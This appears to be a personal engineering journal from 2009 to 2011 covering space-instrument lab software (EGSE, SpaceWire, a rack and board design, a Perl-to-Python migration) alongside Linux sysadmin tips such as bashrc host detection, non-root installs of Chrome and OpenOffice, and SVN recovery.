Journal

2011-03-03 SAFARI software and hardware setup

Below is a basic setup of our software and electronics.

SAFARI setup software and electronics

We have two PCs, one with our Generic EGSE software and the other with a daemon (which collects data). To give you an idea, the Generic EGSE looks as follows:

EGSE Server.png

The daemon simply receives data as raw ethernet frames on an optical ethernet port, concatenates the packets, and transfers them over TCP to the EGSE server.

The reason we use a separate PC for the daemon is that the EGSE server cannot natively receive data over raw ethernet. Thus we use a daemon for that, and since the data rate is too high to run both daemon and server on one machine, the daemon gets its own PC.

'Demux' is short for demultiplexer board, an electronics board:

demux.jpg

This board retrieves the science data from the sensor and then decimates it; two filters are available for that. Still, the amount of data is considerable. An ethernet frame can contain 1500 bytes of data. Since one sample of the sensor is two bytes, we put 730 samples in one CCSDS packet so it fits into one ethernet frame. A good sampling should take 100,000 samples. That is rather a lot of packets, so you'd think jumbo frames would be a natural fit. However, the demux board firmware doesn't support jumbo frames. So we concatenate the CCSDS packets on the PC with the ethernet daemon, then transfer them over TCP to the EGSE server.
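
As a back-of-the-envelope check, here's the packet arithmetic in a few lines of Python (a sketch; the only number not mentioned above is the 6-byte CCSDS primary header):

 SAMPLE_BYTES = 2           # one sensor sample is two bytes
 SAMPLES_PER_PACKET = 730   # chosen so one CCSDS packet fits one frame
 CCSDS_HEADER = 6           # size of the CCSDS primary header in bytes
 FRAME_PAYLOAD = 1500       # maximum ethernet payload

 packet_size = SAMPLES_PER_PACKET * SAMPLE_BYTES + CCSDS_HEADER
 assert packet_size <= FRAME_PAYLOAD         # 1466 <= 1500, so it fits

 samples = 100000
 frames = -(-samples // SAMPLES_PER_PACKET)  # ceiling division
 print(frames)                               # 137 frames per good sampling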

2011-03-03 From which host am I logged in

A previous entry documented how to change your settings in bashrc according to the host you logged in from over SSH.

The solution used the hostname entry from the "who" command. Thing is, it didn't work well because the "who" command also outputs any X sessions.

Here is a script snippet that uses the "host" command instead. Be sure to install it first (under Debian and derivatives it's available in the dnsutils package).

  # Only do the lookup when we actually came in over SSH
  FROM_IP=$(echo $SSH_CLIENT | cut -f1 -d" " | grep -v ":0")
  FROM=""
  [ -n "$FROM_IP" ] && FROM=$(host -t ptr $FROM_IP | cut -d" " -f5)
  case $FROM in
    myhostname*)
      # Enter your settings here
      set -o vi
      ;;
    otherhostname*)
      # Enter your settings here
      set -o vi
      ;;
    mylaptop*|worklaptop*)
      # Enter your settings here
      set -o vi
      ;;
  esac

The stars behind the hostnames are there to ignore the domain name. This is because the FROM=... line gives you the hostname including the domain name, for instance "mylaptop.company.com." (the trailing dot comes straight from the DNS reply).

If you want to strip off everything but the hostname, use something like

  FROM=$(host -t ptr $FROM_IP | cut -d" " -f5 | cut -d"." -f1)

2010-12-25 Google Chrome extensions I cannot live without

In the vein of the previous post: a list of Google Chrome extensions that are very useful:

And if you have a Kindle, this extension is excellent as well:

  • Send to Kindle, sends a webpage correctly formatted to the Kindle via the special e-mail address you got from Amazon


2010-12-19 Firefox extensions I cannot live without

Everybody has them: Firefox extensions they can't live without. At least, the one percent of the world population that has a PC, and then the tiny percentage of those who care about Firefox extensions.

Without further ado, here's my list:

  • Adblock Plus
  • Flashblock
  • Speed Dial
  • Last tab close button
  • Default Full Zoom Level

2010-12-06 Installing OpenOffice in a home directory

To install OpenOffice in a home directory on Debian, take the following steps:

Download the tarball with .deb packages from OpenOffice.org

Unpack it in your home directory:

  $ tar xfz OOo_3.2.1_Linux_x86_install-deb_en-US.tar.gz

Change into the directory with the .deb packages:

  $ cd OOO320_m18_native_packed-1_en-US.9502/DEBS

Unpack these to your home directory with:

  $ for deb in *.deb; do dpkg -x "$deb" ~; done

You'll now have a new subdirectory named 'opt' in your home directory. All executables are in the ~/opt/openoffice.org3/program subdirectory. Add it to your path to easily run OpenOffice, or create custom icons in your Gnome panel (or other favorite desktop environment).

2010-11-26 From which host am I logged in

Sometimes you want to adjust your settings in bashrc depending on which host you are logging in from. The who command reveals the host, and we then use cut (from GNU coreutils) to get the correct field.

  FROM=$(who | grep `whoami` | cut -f2 -d"(")
  case $FROM in
    chara*)
      # Enter your settings here
      set -o vi
      ;;
  esac

Handy for those shared accounts which no IT department seems to admit exist, but which are mightily useful sometimes!

2010-10-14 Some highlights of AHS 2010

A colleague of mine recently went to AHS 2010, a series of annual conferences organized by NASA, ESA and the University of Edinburgh. Topics are on-chip learning, on-the-fly reconfigurable FPGAs, et cetera. This year, the conference took place in Anaheim, California, USA (south of LA).

Some points from my colleague's presentation:

  • One keynote displayed the heat in watts dissipated per square centimeter of chip. Currently, low-power multicore chips are being developed for use in, for example, mobile phones. To lower power usage, chips are now divided into layers, where the top layer can use optics to form a network that transports data between the multiple cores.
  • GSFC is doing a concept study for the Joint Dark Energy Mission, where the challenges are similar to what SRON has encountered during development of the control/readout electronics for the KID detectors, but these detectors work at lower temperatures than what their concept study is using.
  • JPL has developed the iBoard, a digital data acquisition platform for quick prototyping which is nevertheless flight-ready. It's based on the Xilinx Virtex 5.
  • William Zheng, also from JPL, gave an overview of the benefits and challenges of wireless intra-spacecraft communications. There are a lot of possibilities, but it was mentioned that no roadmap is in place that shows what a flight development and/or qualification track would look like.

2010-10-12 Supporting Python

At my dayjob, we have created an application for sensor readout and control. We are creating a software design to support Python for scripting, analysis and plotting, besides the already present combo of Perl for scripting and IDL for analysis.

The list of steps comes down to:

  1. User defines a script
  2. User defines a plot
  3. User kicks off a Perl script that retrieves data
  4. Certain data triggers an IDL script in the EGSE server
  5. After the IDL script has run (if you want to plot analyzed data), it calls a glue function so the EGSE server plots something
  6. Sometimes the Perl script requests the results as well

What we really want is that all of this happens in Python:

  1. User defines a plot
  2. Python script retrieves data
  3. Python script sends data to plot, which is maintained by a running Python process

The catch is that the old situation allows plots to be configured in advance. The disadvantage is that this needs a bunch of glue code and doesn't allow for version control; the advantage is that the plots are defined in a graphical way and don't need any scripting.
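
As a rough sketch of that desired flow (none of this is our actual code; a multiprocessing queue stands in for whatever channel the long-running plot process will listen on):

 import multiprocessing as mp

 def plot_process(queue):
     """Long-running process that owns the plot and consumes data points."""
     points = []
     while True:
         sample = queue.get()
         if sample is None:                # sentinel: shut down
             break
         points.append(sample)
         # a real implementation would redraw a plot here
         print("plotting %d points, last = %s" % (len(points), sample))

 def retrieve_data():
     """Stand-in for the script that retrieves data from the EGSE."""
     return [(t, t * 0.5) for t in range(5)]

 if __name__ == "__main__":
     queue = mp.Queue()
     plotter = mp.Process(target=plot_process, args=(queue,))
     plotter.start()
     for sample in retrieve_data():        # retrieve data, then send to plot
         queue.put(sample)
     queue.put(None)
     plotter.join()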

2010-10-08 SpaceWire at SRON

SpaceWire (short: SpWi) is a standard for connecting the parts of a satellite for data retrieval and control. The speed is 2 to at most 400 Mbit/s. The SWIFT mission and the Lunar Reconnaissance Orbiter use SpaceWire.

SpaceWire Lab Cables.jpg (Image courtesy of STAR-Dundee)

The signal is sent using LVDS, low voltage differential signalling. It's a full duplex line, with two pairs each way. The standard defines the cabling in about eight pages.

The encoding is done using data-strobe encoding. Tx and Rx do not share a common clock. The advantage is that you're resistant to clock skew. The disadvantage is that you now have two clock domains in your FPGA.
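
A toy illustration of the principle (not the character-level details of the standard): the strobe toggles exactly when the data line does not change, so XORing the two lines recovers a clock.

 def ds_encode(bits):
     """Encode a bit sequence into (data, strobe) line states."""
     data, strobe = [], []
     d, s = 0, 0
     for b in bits:
         if b == d:       # data line would not change: toggle strobe instead
             s ^= 1
         d = b            # the data line simply carries the bit
         data.append(d)
         strobe.append(s)
     return data, strobe

 data, strobe = ds_encode([1, 0, 0, 1, 1, 0])
 print([d ^ s for d, s in zip(data, strobe)])   # alternates: recovered clock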

There are four- and ten-bit tokens, where the first bit is a parity bit and the second indicates the token length. The four-bit tokens are for control purposes, and there are four possible control tokens. Notice there is no defined packet content, nor a defined length. In OSI terms, SpaceWire describes the physical and data link layers.

An active SpaceWire link is never silent; between data, the transmitter sends NULL codes. These can also be sent between the bytes of a packet. The standard also defines a time code, a special data packet for time sync purposes; its contents are not defined in the standard. This packet gets priority over data, so you can send it at any time (yes, even right in the middle of a packet). For flow control, the receiver sends flow control tokens (FCTs) to the data sender. For each token, you can send eight characters. These can be sent ahead. The FCT is one of the four control tokens. For link management, a handshake is defined. For parity errors there is no retry mechanism.

Although SpaceWire is point to point, it's possible to create networks; you stick the packet route (the path) in address bytes in front of the packet and, like old-style bang paths, each router removes the leading address byte at each step. Thus routing is simple and defined on a relatively low level.
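
A toy version of that path addressing, ignoring the actual wire format:

 route = [3, 1, 4]                  # output port at each successive router
 packet = bytes(route) + b"payload"
 for _ in route:
     port, packet = packet[0], packet[1:]   # each router strips one byte
     print("forwarded out of port", port)
 print(packet)                      # b'payload': the path has been consumed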

Since there are basically two types of data you'd want to send (sensor and housekeeping data), there are two protocols. RMAP, the remote memory access protocol, is most useful for housekeeping purposes. STP (Streaming Transport Protocol) is better for sensor data. Where SRON used CCSDS packets in the past, RMAP over SpWi is now used. STP is meant for bulk transfers; its packet overhead is lower than RMAP's because the stream is first set up, then explicitly closed when necessary.

SRON has set up a test project whose goal was: two SpWi ports, a proper Linux driver and 8 MByte/s sustained data throughput via a PCI card. We've tried boards from Aurelia and STAR-Dundee. There are also boards from 4Links and Dynamic Engineering. Neither the Linux nor the Windows drivers were able to reach the required speed.

SRON has also looked into a SpaceWire IP core which had to be vendor independent (Actel and Xilinx), implemented as an AMBA interface (for inclusion in a LEON core) and available in VHDL (not just a netlist). And reasonably priced. ESA has this available.

In a test setup with a PCI card and an Actel board, we could only get up to 6 MByte/s because of a slow Linux driver. Yes, that's six megabytes of data per second. A better solution was to put in an intermediary board with a LEON core that translated to Gigabit Ethernet.

There is also a SpaceWire Light IP core via the OpenCores project.

2010-10-05 Ubuntu on an old machine

If you want to use Ubuntu on an older PC, then memory might be tight. I recently got an HP Compaq dc7100 which only has 512 MB of memory, and it will be used for light surfing plus web-based e-mail. It does not have an attached printer.

The following command removes a number of services which are superfluous in the above situation:

 $ sudo apt-get remove bluez brltty pcmciautils speech-dispatcher \
    apport cups system-config-printer-gnome evolution

Explanation: this removes support for Bluetooth, braille input devices, laptop extension cards (PCMCIA), text-to-speech, crash reporting (to Ubuntu), printing and the memory-hungry e-mail/calendar client Evolution.

If you are knowledgeable about security, you can make the decision to remove AppArmor. More information here: AppArmor in Ubuntu.

 $ sudo apt-get remove apparmor

Also, on such a machine it is wise to turn off all visual effects by going to menu System, Preferences, Appearance. Switch to the tab Visual Effects and select None, then click Close. Explanation: this switches your window manager from Compiz to the much lighter Metacity.

The above procedure saved me 30 MB, going from 125 MB of used memory to 95 MB. To find more memory-hungry processes, use the following procedure. First, find a process:

 $ ps -e -o rss,vsz,cmd --sort=rss | sort -n -r | head

Then find the path to the process:

 $ whereis <processname>

If you have a path, find the corresponding package:

 $ dpkg-query -S /path/to/programname

Then find out if you really need this package:

 $ dpkg -s <packagename>

If you don't need it, you can remove it:

 $ sudo apt-get remove <packagename>

2010-09-23 From Perl to Python

At work, we are currently using Perl and IDL alongside our EGSE server software (written in C++). For controlling electronics, we use Perl. For visualizing the electronics readouts, we use IDL.

For various reasons, we are looking to replace both parts with Python equivalents. This involves a port of the software as well as a migration path. It also offers the chance to do a clean, object-oriented rewrite which could mirror the C++ libraries.

Perl basically provides scripted control/readout of sensor equipment. These scripts can be edited and run from within the EGSE, but they can also be run from the commandline.

IDL, however, is more tightly integrated with the EGSE: it is compiled along with it. It listens for data requests; the data is analyzed and then plotted, as well as transported back to the controlling Perl script.

Besides the plots made by IDL, it's also possible to create plots with the EGSE software itself. We have to look at how we want these to co-exist with the Python plotting facilities.

We will create a design document where we look at the following items:

  • How the Perl control/readout libraries will be ported to Python
  • Which plots are present in the EGSE, and what we will do with them
  • Where the Python scripts will run
  • Where the Python plots will display
  • What current problems must be fixed

2010-08-30 How to recover from unexpected reboots

It's pretty interesting to dive into the situation of recovering from unexpected reboots. Our usual lab setup consists of three parts:

  • The PC running our Generic EGSE software: a user interface for powering, controlling and reading out a sensor
  • The so-called Controller board, an off-the-shelf board from Pender Electronics, running our embedded software
  • A project-specific electronics board with one or more DACs and/or ADCs to bias and control the sensor equipment, hereafter called the biasing board.

DBSsetup.png

Any of these could suffer unexpected power loss and subsequent power restore. The basic question is: what do we handle in the way of recovery?

For lots of things, it's necessary to maintain state. An example is the following: you are a scientist and use the above setup to set up and test your sensor. You leave the lab, but then the PC unexpectedly reboots because a system administrator mistakenly rebooted it remotely.

When the EGSE software automatically starts again, should it attempt to initialize the biasing board? Probably not -- you may be running a test and the sensor settings should not be changed.

Then again, there is also the situation of an expected power-up. If you want your electronics to always be initialized upon normal startup, you have to differentiate between the two.

Now there's complexity: both the EGSE and the Controller board will have to maintain state. Any discrepancies will have to be resolved between the two. In the end, it might be much simpler to just say that we do not support automatic initialization when the Controller board comes online.
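
One way to tell the two situations apart is a marker file that only a clean shutdown leaves behind. A minimal sketch, in which the file name and the initialization routine are made up:

 import os

 MARKER = "/var/lib/egse/clean_shutdown"   # hypothetical marker file

 def initialize_biasing_board():
     print("initializing biasing board")   # placeholder for the real sequence

 def startup():
     if os.path.exists(MARKER):
         os.remove(MARKER)
         initialize_biasing_board()        # normal startup: safe to initialize
     else:
         # unexpected reboot: a test may be running, leave the sensor alone
         print("recovery startup, skipping initialization")

 def shutdown():
     open(MARKER, "w").close()             # marker is written only on clean exit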

Choices, choices...

2010-08-24 Thoughts on a software design part 2

When I asked a colleague for criticism today, I got some additional pointers and ideas on my design sketch. Some concepts were implicit, but become clearer when mentioned explicitly:

  • The board running the embedded software (ESW) actually functions as a controller for the rack. Thus, call it the Controller.
  • The slot object (more on that later).

The Controller board will carry state for the equipment that's in the rack, but since a (possibly accidental) power-down of the rack would lose state, the previously mentioned discovery mechanism still has to be created.

The software will also get a lot simpler if we assume there is some intelligence in the rack. Thus, we can assume that a future rack will perform the following functions:

  • Sends a signal to the Controller board telling a board has been inserted in a certain slot;
  • Can cut the power of a specific slot.

He also pointed out that it's worth thinking about whether we should model the rack functions themselves, perhaps as a class called RackDriver. The slots in the rack were previously left out of the model because they did not have any meaning for the software. This now changes, since we assume the rack has some intelligence.

2010-08-17 Thoughts on a SW design

So far, the custom software we built at SRON assumed that users would manually configure the software when any hardware was replaced, and that there was only one electronics board present. The following is a preliminary design on the software changes required to support an array of boards that is placed in a standard format rack.

Overview

The basis is that we are developing standard electronics boards for certain tasks, for instance a standard design for an electronics card that contains a DAC and an ADC. These cards must work in array-like structures, for instance a standard 19-inch subrack which contains a number of these standard electronics boards. This could be used for biasing a sensor, reading out a sensor, housekeeping duties and PC communication duties. Such a rack consists of a number of slots, each of which consists of a rail that guides an inserted board to the backplane. This backplane provides power and the connection to the software. The central requirement is: the user should be able to add and remove boards without complex procedures. Any procedures like board-specific power-up/power-down sequences should be handled automatically.

The setup thus consists of two parts:

  • The hardware consisting of:
    • A rack with electronics boards
    • An off-the-shelf, generic electronics board with a LEON-based FPGA core (made by Pender Electronics)
  • The software consisting of:
    • The PC which runs the EGSE software (Electronic Ground Support Equipment)
    • The LEON core running ESW (our embedded software).

Use cases

To support the requirements sketched above, we can recognize several use cases in this setup:

  • Adding, removing or replacing a board
  • Powering up/down the rack (planned or unexpectedly)
  • Powering up/down the software (planned or unexpectedly)

Use case: adding, removing or replacing a board

The user must be able to add or remove a board into the rack, and the software should detect this. Also, most boards must be initialized in some way. Thus there must be hooks that run a particular script when hardware changes. This also means that the hardware must actively identify itself, let the script take care of this, or give the software some uniform way of checking this. More on this later.

Replacing a board, or moving it from one slot to another, can be covered by a simple remove/add action.

Use case: powering up a rack

Since the hardware and software can be powered on and off independently, both situations must be covered. Thus the software must have some sort of discovery mechanism when starting. The hardware must have some way of rate limiting if it actively advertises the adding or removing of a board. More on this later.

Powering down a rack

There are two possible ways in which a rack is powered down: expectedly and unexpectedly. The software does not need to be adapted either way. In the case of an expected power down, there should be a project-specific power down script. In the case of an unexpected power down, it should be determined whether the project needs a way of detecting this.

Powering up the software

When the EGSE is powered up, it should see whether a rack is connected and if so, a discovery mechanism should see what boards are present. More on the discovery mechanism later. When the ESW is powered up, no particular actions are necessary.

Powering down the software

There are two possible ways in which the EGSE is powered down: expectedly and unexpectedly. The software does not need to be adapted either way. In the case of an expected power down, there should be a project-specific power down script. In the case of an unexpected power down, it should be determined whether the project needs a way of detecting this.

The ESW can also be powered down, either accidentally or on request. There is no difference between the two, since the ESW functions as a pass-through and does not maintain state.

Objects and attributes

For the above use cases, the software obviously requires an up-to-date register of all available boards plus their addresses. The following objects can be found in the use cases: rack, slot, board. A rack is divided into slots. A slot contains a board. Typically, racks can have shelves, but for now we assume there's only one shelf. Also, racks are contained in a cabinet, but again, there can be only one rack for now.

The current requirements do not necessitate that the software knows exactly which slots are occupied. Thus, this concept is currently not taken into account. That leaves us with the following classes:

  • Rack, with attributes: boards.
  • Board, with attributes: version, address and insertion script.

Addresses and discovery

There are two options for addressing. Currently, all boards have an address pre-programmed into the FPGA. This is fine in a situation where we can manually ensure each address is unique. The software will then simply use a discovery mechanism where a dummy request is sent to each possible address. When a reply is received, the board is added to the list of present boards. Discovery must be quick since it inhibits other usage of the bus, and it is done periodically. Thus the most logical place to run the discovery is probably the ESW.

But when using multiple off-the-shelf boards, it is much easier to let the boards actively announce that they were inserted, and let the software hand out addresses. The software still needs a discovery mechanism in case the software is brought down for some reason. This can be the same as previously mentioned.
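
To make this concrete, a minimal sketch of the classes and the polling discovery (the address range and the ping callback are placeholders, not our actual protocol):

 class Board:
     def __init__(self, address):
         self.address = address    # version and insertion script omitted

 class Rack:
     def __init__(self):
         self.boards = []

     def discover(self, ping, addresses=range(1, 16)):
         """Send a dummy request to every possible address, keep responders."""
         self.boards = [Board(a) for a in addresses if ping(a)]
         return self.boards

 # usage, with a stand-in for the real bus request:
 present = {3, 7}            # pretend boards sit at these two addresses
 rack = Rack()
 rack.discover(ping=lambda address: address in present)
 print([b.address for b in rack.boards])   # [3, 7]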

Releases

In the first release:

  • We will let the software poll the hardware chain, and thus detect when hardware has been inserted or removed.
  • Boards will use pre-programmed addresses.
  • The concept of slots is not necessary.

For version two, we see the following points:

  • Inserted boards actively trigger a signal that notifies the software. This is currently not incorporated into the protocol that we use for communication between hardware and software. The hardware must have a way of rate limiting its active signal, perhaps by waiting for a random time.
  • After a board is inserted, the software will issue an address that uniquely identifies the board. The board will then start listening only to that address.

For version three, we see the following points:

  • Introduction of the concept of slots into the software and hardware. When (or better: before) a board is removed from the rack, a signal is sent to the software.

Unresolved points

  1. Above, it is assumed that the embedded software runs on a LEON3-based board that's directly connected to the backplane of the rack. Is this assumption correct?
  2. The current bus protocol is not really fast (2 MHz), is this fast enough to support a number of measurement boards?
  3. Do we need to detect when the rack is powered down immediately? Or is it OK to wait for the next action (user or scripted) to generate a communication timeout?
  4. It should be possible for selected boards to be powered down or reset from the software. However, since in the current backplane design one power line is provided for all boards, this does not seem possible right now.

Miscellaneous notes

  1. Some boards are tall enough to occupy multiple slots, for instance when the board has a high-speed FPGA with a heat sink stuck on it. But for now, we ignore this. The software does not need to know that some slots appear empty but are actually physically blocked from usage.
  2. If a board is in the middle of a measurement, can it answer the discovery mechanism in the standard hardware design?

2010-07-20 Coverity demo

We got a demo from the Coverity people. We ran their tool on our code base in advance. Via a WebEx session we got an explanation of the results, but first we got an overview of the company and their projects since some of the team were new to this stuff.

It's a pretty young company, founded less than ten years ago, and their aim is to deliver products that improve the quality of your software. Clients are in the medical and aerospace sectors (see the Wikipedia article on Coverity). They have 1000+ customers.

From the web-based Integrity Center software, several tools can be controlled. One of them is static analysis, the Prevent tool. The tool identifies critical problems, not the more trivial things like style compliance et cetera.

Since bugs are cheaper to fix during development than in the field, this saves the user time and money.

The software watches the compiler calls that are made when you do a build (via make) and then works on the code in the same way. It's not a replacement for unit tests. After a run, a database of the results is written, and there is a web frontend where you can browse that database.

The screen shows a number of defects, with filter options on the left. When clicking on a defect, you can see the code as well as the classification of the defect. Along with the classification there is a short explanation of this type of issue. Clicking further will also give simple examples so you better understand the defect.

Each defect can be assigned to a certain team member. We have already invested in using Trac, so I'm not so sure that's useful for us.

We had questions about finding concurrency problems. Coverity can help with this, but they support pthreads out of the box. Since we use QThread, we would normally have to make a model for that library. However, since we have the code available (Qt is open source) and it uses pthreads underneath, it's not a problem and Coverity will be able to pick it up automatically.

Besides the existing checks, it's possible to add your own checks. Perhaps you want to enforce a certain way in which you use an external library.

The software tries to be smart. For example, sometimes you write clever code that would usually trigger an error. Coverity will use heuristics and not report it if the rest of the code base shows that this is not something worth reporting.

We closed off the demo with a discussion on licensing. The account manager teams up with a technical consultant, and together they work out the requirements and the resulting cost savings pretty extensively. From that, the price is derived. There are other licensing models, however.

2010-07-15 Sending email from a Perl script

If you're on Debian or Ubuntu Linux and you want to send a quick e-mail from a Perl script, use the Email::Send module (this module has been superseded by the Email::Sender module, but that one doesn't seem to be present in the Debian Stable package repository yet).

First, install the appropriate packages:

 $ sudo apt-get install libemail-send-perl

Then use the following snippet. Note the blank line that separates the headers from the body:

 use Email::Send;
 my $message = <<'__MESSAGE__';
 To: bartvk@example.com
 From: bartvk@example.com
 Subject: This is a mail from a Perl script

 This is the body of an e-mail from a Perl script
 __MESSAGE__
 my $sender = Email::Send->new({mailer => 'Sendmail'});
 $sender->send($message);

Now go and use this wisely, my young padawan. Some observations:

  1. You rely on Sendmail being present
  2. You trust all input variables
  3. You are not using HTML, attachments, or what have you

2010-01-17 Calibrate good times

We have a DT-470 temperature sensor in the cryostat of the project I'm currently working on. The problem is that our software is displaying the wrong readout. I'm trying to figure out how to display the correct value in Kelvin.

I've got the following to work with:

  • The cryostat is filled with liquid nitrogen, which we know is around 77 K.
  • The sensor was also read out when the cryostat was not cooled, so we have a combination of raw value (as read from electronics) and known temperature as well (room temperature, 20 degrees Celsius, is about 293 K).
  • We've been provided with a data sheet from which a polynomial can be derived.
  • The spec says we need to drive the sensor with a 10 uA current, but in actuality we drive it with a 12.368 uA current. I'm told this is not a big deal, because the difference in current is unlikely to cause a difference in self-heating.
  • The spec also gives us a lookup table to transform raw value to Kelvins
  • Because of the way the sensor is read out, we need to apply an additional offset and factor (our electronics influence/amplify the readout).
  • The sensor readout is linear for the range from 10 to 200 K, then follows a curve to 0 K.

The software has the ability to apply a polynomial to a raw value (i.e. a value that's read out from the electronics), as well as apply a user-configurable function to a value. The latter is usually used for convenience, for example when the electronics give us a negative value where we'd rather receive a positive one.

In this case, the polynomial is applied to correct the value for the way our electronics influence the raw value. Then, the user-configurable function is applied, which in this case is the polynomial that follows from the data sheet.
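
In Python pseudocode, the two stages could look as follows; all gain, offset and lookup-table numbers are invented placeholders, not our calibration data:

 # stage 1: correct for the electronics (a simple offset plus factor)
 GAIN, OFFSET = 1.02, -0.003          # placeholder calibration values

 def correct_raw(raw_volts):
     return raw_volts * GAIN + OFFSET

 # stage 2: the data-sheet conversion, approximated here by interpolating
 # a (voltage, kelvin) lookup table like the one in the DT-470 spec
 TABLE = [(0.50, 293.0), (0.60, 250.0), (0.80, 150.0), (1.00, 77.0)]

 def volts_to_kelvin(v):
     for (v0, t0), (v1, t1) in zip(TABLE, TABLE[1:]):
         if v0 <= v <= v1:
             return t0 + (t1 - t0) * (v - v0) / (v1 - v0)
     raise ValueError("voltage outside lookup table")

 print(volts_to_kelvin(correct_raw(0.98)))   # lands near liquid-nitrogen range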

So the steps are:

  • Remove the electronics and drive the sensor manually. Do we get the same value (raw) as we get from the electronics?
  • Get the raw value, and see whether our first polynomial is OK (the first polynomial is a simple one, just an offset plus a factor). We can do this by looking up the raw value in the lookup table.
  • Use that in-between value and check the lookup table to see whether the second polynomial is OK.
  • The heating of the electronics board could also play a role; we need to check that as well and, if so, correct the first polynomial.

2009-12-09 Installing Linux Google Chrome as a regular user

Early December 2009, Google launched the beta version of the Chrome browser for Linux. They provide RPM and Deb packages, allowing for easy installation.

Sometimes however, you're working on a Linux PC where you do not have root access. The following procedure allows you to install and run Chrome as a normal user:

  • Download the .deb package and save it into your home directory
  • Unpack it into a subdirectory called Chrome with the following command:
 $ dpkg -x google-chrome-beta_current_i386.deb Chrome
  • To easily start up the app, create a launcher icon. Here is a good tutorial on adding a launcher to a panel. In the name field, type Chrome. In the command field, type /home/yourusername/Chrome/opt/google/chrome/google-chrome. For the icon, browse to Chrome/opt/google/chrome and pick one of the icons there.

2009-12-02 Who is logging in

Who is logging into my Linux workstation?

At my most regular workplace (I have several), I have a Debian Linux workstation. The username/password information is managed over NIS, and it is configured such that every user can log into every workstation.

I have no problem with this, but do like to know who is logging in when I'm using the desktop. Thus at startup, I run the following script in the background:

  #!/bin/sh
  # Warn me when another user logs into this workstation.
  [ ! -x /usr/bin/whoami ] && exit 1
  [ ! -x /usr/bin/gmessage ] && exit 1
  while true
  do
    LOGINNAME=$(w -h | cut -f1 -d' ' | grep -v "$(whoami)" | sort -u)
    if [ -n "$LOGINNAME" ]; then
      gmessage "User $LOGINNAME logged in" -button OK
    else
      sleep 1
    fi
  done

Save this script somewhere in your home directory. I've called it 'loginwatch'. Then make it executable and run it in the background as follows:

 $ chmod +x loginwatch
 $ ./loginwatch &

This script assumes that you use the Gnome desktop, because it uses the gmessage utility.

2009-10-19 Rolling back a change

Suppose you inadvertently made changes in some files some time back. You can examine revisions of files with

 $ svn log ccsds.h

You see that the previous revision was 205 and that it was correct. With an SVN merge, you can make that old revision the current revision:

 $ svn merge -r HEAD:205 ccsds.h

Check in your file and you're done!

2009-08-28 PHP client using Thrift

Today I was thinking about a PHP script that uses Thrift to retrieve a couple of results. We have the following Thrift definition:

 /* This contains the three things identifying a logging program */
 struct Logger {
     1:  string      userName,
     2:  string      hostName,
     3:  string      appName
 }
 /* This is a debug message */
 struct Message {
     1:  Logger      origin,
     2:  string      content
 }
 /* This defines the remote logging services */
 service RemoteLog {
     // send a log message to the logserver
     oneway void         newMessage      (1:Message aMessage)
    
     // get list of loggers available
     list<Logger>        getLoggers      ()
    
     // get messages from a specific logger
     list<Message>       getMessages     (1:Logger aLogger, 2:i32 aFromID, 3:i32 aMax)
 }

However, I'd then have to implement the reverse of the above description. In other words, I am asking the remote logging service for whatever it has received over time. To get this up and running, the following steps have to be taken:

  1. Define Thrift definition
  2. Generate PHP stubs (client side)
  3. Rework these into script
  4. Generate C++ stubs (server side)

2009-08-24 Archiving to a branch

Today, I needed to archive and clean up old machines that were used for a project that has reached its end-of-life. These PCs were used in a laboratory setup, controlling custom electronics.

We run our custom lab software on those PCs and the installation is done by checking out a copy of the source, and doing a local compile. Problem is that these machines have been off the network for a while and some local modifications were necessary. While cleaning up, I found that these modifications were not committed to the SVN repository.

In the meantime however, we worked hard on the software and now I cannot just do an update and commit these old modifications. The solution is to create a branch and commit the changes to that branch.

First, find out what the local version is:

 $ svnversion .
 1143:1150M

We'll make a branch of revision 1150 first. Then we'll check out that branch in another directory:

 $ mkdir ~/tmp
 $ cd ~/tmp
 $ svn copy -r 1150 http://repository.example.com/svn/our_software/trunk \
   http://repository.example.com/svn/our_software/branch-project-pc0054
 Committed revision 2011.
 $ svn co http://repository.example.com/svn/our_software/branch-project-pc0054
 Checked out revision 2011.

Then we'll go to the local copy that was running all the time on this PC, and create a patch of the local version:

 $ cd ~/sw
 $ svn diff > ~/hackwork.patch

Go back to the directory with the newly created branch. Apply that patch to the branch, then commit.

 $ cd ~/tmp/our_software/branch-project-pc0054
 $ patch -p 0 < ~/hackwork.patch
 $ svn ci -m "Archiving local modifications"
 Committed revision 2012.

2009-06-08 Using D-Bus in your application

We've got a Qt-based application (daemon style) which writes log files. In order to integrate the app nicely into our Linux environment, the daemon should be able to receive a signal telling it to close its log files and start writing new ones.

Rotating logs is done by placing a small instructive text file in /etc/logrotate.d and by giving the daemon the ability to receive a signal of some sort.

The old-school way is using plain old Unix signals, but these interrupt system calls. We do not want that to happen; the daemons run in a lab environment and such an interruption could disturb a measurement.

The new style is using D-Bus for this stuff.
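
For illustration, the trigger side could look like the following sketch using the dbus-python bindings; the service name, object path, interface and method are invented placeholders (the Qt daemon would register the real ones via QtDBus):

 import dbus

 # hypothetical names; the daemon would register the real ones on the bus
 bus = dbus.SessionBus()
 daemon = bus.get_object("nl.example.LogDaemon", "/LogDaemon")
 logctl = dbus.Interface(daemon, dbus_interface="nl.example.LogDaemon")

 # logrotate's postrotate script would run this to request new log files
 logctl.RotateLogs()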

2009-06-06 Getting Chrome running on Fedora

Recently, the alpha builds of Chrome for Linux became available. Unfortunately, only Debian and Ubuntu packages were released.

To get Chrome running under Fedora 10, take the following steps:

Download the chrome .deb file

Create a temporary directory in your home dir:

 $ mkdir ~/blah

Unpack the .deb file there:

 $ cd ~/blah
 $ ar x ~/Download/chrome*deb

Unpack the binary code:

 $ tar xfz data.tar.gz

Move the binaries to /opt:

 $ sudo mv opt/* /opt

Now create a couple of symlinks in /usr/lib so Chrome can find all the necessary libraries (apparently these are named differently under Debian and Ubuntu):

 $ cd /usr/lib
 $ sudo ln -s libnss3.so libnss3.so.1d
 $ sudo ln -s libnssutil3.so libnssutil3.so.1d
 $ sudo ln -s libsmime3.so libsmime3.so.1d
 $ sudo ln -s libssl3.so libssl3.so.1d
 $ sudo ln -s libplds4.so libplds4.so.0d
 $ sudo ln -s libplc4.so libplc4.so.0d
 $ sudo ln -s libnspr4.so libnspr4.so.0d

Now Chrome can be started:

 $ /opt/google/chrome/google-chrome

Create an application launcher on any panel for easy access.

2009-03-27 LEON3

At work, we're currently experimenting with the LEON3 processor. It's an open chip design that contains a general-purpose CPU and buses for several applications. It's possible to design your own logic for controlling custom electronics, and then use the bus to connect your logic to the CPU.

